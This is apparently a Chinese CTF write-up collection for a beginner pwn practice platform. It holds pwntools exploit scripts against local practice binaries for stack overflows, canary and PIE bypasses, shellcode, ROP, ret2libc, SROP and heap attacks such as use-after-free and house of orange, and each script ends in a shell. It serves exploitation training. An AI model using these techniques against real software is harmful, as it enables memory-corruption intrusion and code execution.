pwn入门练习平台wp

pwn入门练习平台exp

栈溢出

ez_leak

from pwn import *
r=process('./ez_leak')
payload=b'a'*0x48+p64(0x4011CB)
r.sendline(payload)
r.interactive()

绕过canary

from pwn import *
r=process('./canary')
ret=0x4011E7
r.recvuntil(b'\n')
payload=b'a'*24+b'b'
r.send(payload)
r.recvuntil(b'b')
canary=b'\x00'+r.recv(7)
log.success('canary: ' + hex(u64(canary)))
payload=b'a'*24+canary+p64(ret)+p64(0x4011DB)
r.send(payload)
r.interactive()

PIE

from pwn import *
r=process('./PIE')
gdb.attach(r)
r.recvuntil(b'gift: ')
leak=int(r.recvuntil(b'\n'),16)
base=leak-0x12A2
log.success('leak: ' + hex(leak))
payload=b'a'*0x48+b'b'
r.send(payload)
r.recvuntil(b'b')
canary=b'\x00'+r.recv(7)
log.success('canary: ' + hex(u64(canary)))
payload=b'a'*0x48+canary+b'b'*8+p64(base+0x11EE)
r.send(payload)
r.interactive()

shellcode

EZ Shellcode

from pwn import *
context.arch = 'amd64'
r=process('./ezshellcode')
payload=asm(shellcraft.sh())
r.sendline(payload)
r.interactive()

orw

待写......

侧信道攻击

待写......

ROP链

基础ROP链

from pwn import *
r=process('./ezROP')
elf=ELF('./ezROP')
system=elf.symbols['system']
sh=0x404030
pop_rdi=0x40115A
ret=0x40115B
payload=b'a'*0x48+p64(ret)+p64(pop_rdi)+p64(sh)+p64(system)
r.sendline(payload)
r.interactive()

ret2syscall

from pwn import *
r=process('./ret2syscall')
gdb.attach(r,'b *0x4011CF')
bss=0x404040
pop_rax=0x401146
pop_rcx=0x40114e
pop_rdi=0x401148 
pop_rdx=0x40114c
pop_rsi=0x40114a
syscall=0x401150
ret=syscall+1
payload=b'a'*0x48+p64(pop_rax)+p64(0)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss)+p64(pop_rdx)+p64(0x8)+p64(syscall)#read(0, bss, 8)
payload+= p64(pop_rax)+p64(0x3b)+p64(pop_rdi)+p64(bss)+p64(pop_rsi)+p64(0x0)+p64(pop_rdx)+p64(0x0)+p64(syscall) #execve(bss, 0, 0)
r.send(payload.ljust(0x100, b'\x00'))
r.sendline(b'/bin/sh\x00\x00')
r.interactive()

ret2libc

from pwn import *
from LibcSearcher import *
r=process('./ret2libc')
gdb.attach(r)
r.recvuntil(b'ret2libc')
r.recvline()
elf=ELF('./ret2libc')
puts_got=elf.got['puts']
pop_rdi=0x40114a
main=0x4011B4
ret=0x4011FE
payload=b'a'*0x48+p64(ret)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4011B0)
r.sendline(payload)
puts_addr=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.success('puts: ' + hex(puts_addr))
libc=LibcSearcher('puts', puts_addr)
libc_base=puts_addr-libc.dump('puts')+0x7000
system=libc_base+0x053110
bin_sh=libc_base+0x1a7ea4
log.success('libc_base: ' + hex(libc_base))
log.success('system: ' + hex(system))
log.success('bin_sh: ' + hex(bin_sh))

payload2=b'a'*0x48+p64(pop_rdi)+p64(bin_sh)+p64(system)
r.sendline(payload2)

r.interactive()

ret2csu

待写......

SROP攻击

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
r = process('./rootersctf_2019_srop')

pop_rax_syscall = 0x401032

syscall = 0x401033
suig=SigreturnFrame()
suig.rax = 0
suig.rdi = 0
suig.rsi = 0x402000
suig.rdx = 0x100
suig.rip = syscall
suig.rbp=0x402000+0x20

sig2=SigreturnFrame()
sig2.rax = 59
sig2.rdi = 0x402000
sig2.rsi = 0
sig2.rdx = 0
sig2.rip = 0x401033

r.recvuntil("Hey, can i get some feedback for the CTF?\n")
payload=b'a'*0x88+p64(pop_rax_syscall)+p64(0xf)+bytes(suig)
r.sendline(payload)
sleep(1)
r.sendline(b'/bin/sh\x00'+b'a'*0x20+p64(pop_rax_syscall)+p64(0xf)+bytes(sig2))
r.interactive()

格式化字符串漏洞

格式化字符串读取

待写......

格式化字符串写入

待写......

堆漏洞利用技术

UAF

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
r=process('./init')
libc=ELF('./libc.so.6')

gdb.attach(r, 'b *0x4016fa')

heap_list=0x4040A0
def add(size, content):
    r.sendlineafter(b'Your choice: ', b'1')
    r.sendlineafter(b'Size: ', str(size))
    r.sendafter(b'Content: ', content)

def delete(idx):
    r.sendlineafter(b'Your choice: ', b'2')
    r.sendafter(b'Index: ', str(idx))

def edit(idx,content):
    r.sendlineafter(b'Your choice: ', b'3')
    r.sendafter(b'edit:', str(idx))
    r.recvuntil(b'content:')
    r.send(content)

def show(idx):
    r.sendlineafter(b'Your choice: ', b'4')
    r.sendafter(b'edit:', str(idx))

def leak():
    r.sendlineafter(b'Your choice: ', b'6')

r.recvuntil(b'0x')
puts_addr=int(r.recv(12),16)
log.success('puts_addr: ' + hex(puts_addr))
libc_base=puts_addr - libc.symbols['puts']
log.success('libc_base: ' + hex(libc_base))
malloc_hook=libc_base + libc.symbols['__malloc_hook']
ogg=[0x4f2be,0x4f2c5,0x4f322,0x10a38c]

add(0x20, b'a')
delete(0)
add(0x20, b'b')
delete(0)
edit(2, b'a')



add(0x20, b'a')
delete(0)
delete(0)
edit(0, p64(malloc_hook))
add(0x20, b'a')
add(0x20, p64(libc_base + ogg[3]))
r.sendlineafter(b'Your choice: ', b'1')
r.sendlineafter(b'Size: ', b'1')
r.interactive()

double free

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
r=process('./init')
libc=ELF('./libc.so.6')

heap_list=0x4040A0
def add(size, content):
    r.sendlineafter(b'Your choice: ', b'1')
    r.sendlineafter(b'Size: ', str(size))
    r.sendafter(b'Content: ', content)

def delete(idx):
    r.sendlineafter(b'Your choice: ', b'2')
    r.sendafter(b'Index: ', str(idx))

def edit(idx,content):
    r.sendlineafter(b'Your choice: ', b'3')
    r.sendafter(b'edit:', str(idx))
    r.recvuntil(b'content:')
    r.send(content)

def show(idx):
    r.sendlineafter(b'Your choice: ', b'4')
    r.sendafter(b'edit:', str(idx))

def leak():
    r.sendlineafter(b'Your choice: ', b'6')

r.recvuntil(b'0x')
puts_addr=int(r.recv(12),16)
log.success('puts_addr: ' + hex(puts_addr))
libc_base=puts_addr - libc.symbols['puts']
log.success('libc_base: ' + hex(libc_base))
malloc_hook=libc_base + libc.symbols['__malloc_hook']
ogg=[0x4f2be,0x4f2c5,0x4f322,0x10a38c]

add(0x20, b'a')
delete(0)
add(0x20, b'b')
delete(0)
edit(2, b'a')

add(0x20, b'a')
delete(0)
delete(0)
edit(0, p64(malloc_hook))
add(0x20, b'a')
add(0x20, p64(libc_base + ogg[3]))
r.sendlineafter(b'Your choice: ', b'1')
r.sendlineafter(b'Size: ', b'1')
r.interactive()

house of orange

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
r=process('./init')
libc=ELF('./libc.so.6')

# gdb.attach(r, 'b *0x401716')
bss=0x403680
heap_list=0x4040A0
def add(size, content):
    r.sendlineafter(b'Your choice: ', b'1')
    r.sendlineafter(b'Size: ', str(size))
    r.sendafter(b'Content: ', content)

def delete(idx):
    r.sendlineafter(b'Your choice: ', b'2')
    r.sendafter(b'Index: ', str(idx))

def edit(idx,content):
    r.sendlineafter(b'Your choice: ', b'3')
    r.sendafter(b'edit:', str(idx))
    r.recvuntil(b'content:')
    r.sendline(content)

def show(idx):
    r.sendlineafter(b'Your choice: ', b'4')
    r.sendafter(b'edit:', str(idx))

def leak():
    r.sendlineafter(b'Your choice: ', b'6')
    r.recvuntil(b'[0]: ')
    heap_addr=int(r.recv(10),16)-0x10
    log.success('heap_addr: ' + hex(heap_addr))
    return heap_addr

r.recvuntil(b'0x')
puts_addr=int(r.recv(12),16)
log.success('puts_addr: ' + hex(puts_addr))
libc_base=puts_addr - libc.symbols['puts']
log.success('libc_base: ' + hex(libc_base))
malloc_hook=libc_base + libc.symbols['__malloc_hook']
log.success('__malloc_hook: ' + hex(malloc_hook))
global_max_fast=libc_base + 0x3c67f8
log.success('global_max_fast: ' + hex(global_max_fast))
ogg=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libc_base + ogg[3]
log.success('one_gadget: ' + hex(one_gadget))
io_list_all=libc_base + 0x3c5520
log.success('__IO_list_all: ' + hex(io_list_all))
sh=libc_base + next(libc.search(b'/bin/sh'))
system=libc_base + libc.symbols['system']
log.success('system: ' + hex(system))

#FSOP+ORANGE
add(0x3f0,b'a')
topsize=b'a'*0x3f0
edit(0,topsize+p64(0)+p64(0xc01))
add(0x1000,b'b')
leak()
r.recvuntil(b'[0]: ')
heap_addr=int(r.recv(10),16)
log.success('heap_addr: ' + hex(heap_addr))
IO_jump_t=heap_addr + 0x400+0xd8-0x10
payload=b'/bin/sh\x00'+p64(0x60)+p64(0)+p64(io_list_all-0x10)+p64(0)+p64(1)+p64(0)+p64(0)
payload=payload.ljust(0xd8,b'\x00')+p64(IO_jump_t)+p64(0)*2+p64(system)
payload=topsize+payload
edit(0,payload)
# sleep(0.5)
r.sendlineafter(b'Your choice: ', b'1')
r.sendlineafter(b'Size: ', str(1))

r.interactive()